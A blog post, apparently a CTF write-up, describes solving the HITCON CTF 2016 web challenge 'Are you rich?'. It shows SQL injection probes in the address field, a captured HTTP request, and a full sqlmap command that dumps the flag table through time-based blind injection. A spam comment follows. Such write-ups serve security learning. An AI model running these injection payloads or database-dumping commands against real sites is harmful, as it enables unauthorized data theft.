หน้าเว็บ

วันจันทร์ที่ 10 ตุลาคม พ.ศ. 2559

HITCON CTF 2016: Are you rich? (Web) Write-up


Descriptions:
Are you rich? Buy the flag!
http://52.197.140.254/are_you_rich/
ps. You should NOT pay anything for this challenge
Some error messages which is non-related to challenge have been removed
Solution:

1. Access to website have 2 functions, Get our bitcoin address and Verify payment.


2. Try to get our bitcoin address, It will generate some Bitcoin Address and go to verify it.


3. Not have enough money, I guess after get our bitcoin it may insert this bitcoin into database and have verify payment to check. I try to SQL Injection in Address field.

4. ' or 1=1# --- Found more than 1 records?


5. ' or 1=2# --- does not have enough confirmed money?


4. Confirm the parameter address have vulnerable to SQL Injection, I use Burp Suite to capture HTTP request and copy it to text file.

POST /are_you_rich/verify.php?address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c HTTP/1.1
Host: 52.197.140.254
Proxy-Connection: keep-alive
Content-Length: 79
Cache-Control: max-age=0
Origin: http://52.197.140.254
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://52.197.140.254/are_you_rich/verify.php?address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c
Accept-Encoding: gzip, deflate
Accept-Language: th,en;q=0.8

address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c&flag_id=flag1&submit=

5. Using SQLmap -r option to Load HTTP request from a text file, SQLmap verify this vulnerable is Time-Based Blind SQL Injection, and final SQLmap option that use for get a flag.

python sqlmap.py -r web50.txt -p address --threads=5 --technique=T --dbms=mysql --dbs --string="Found more than" -D areyourich -T flag1 -C flag --dump

6. Wait a several minute to retrieve a flag.


In Burp Suite (Union Based)


Flag: hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}

7 ความคิดเห็น:

  1. I was very happy to find this site. I really enjoyed reading this article today and think it might be one of the best articles I have read so far. I wanted to thank you for this excellent reading !! I really enjoy every part and have bookmarked you to see the new things you post. Well done for this excellent article. Please keep this work of the same quality.
    Data Science Course in Bangalore

    ตอบกลับลบ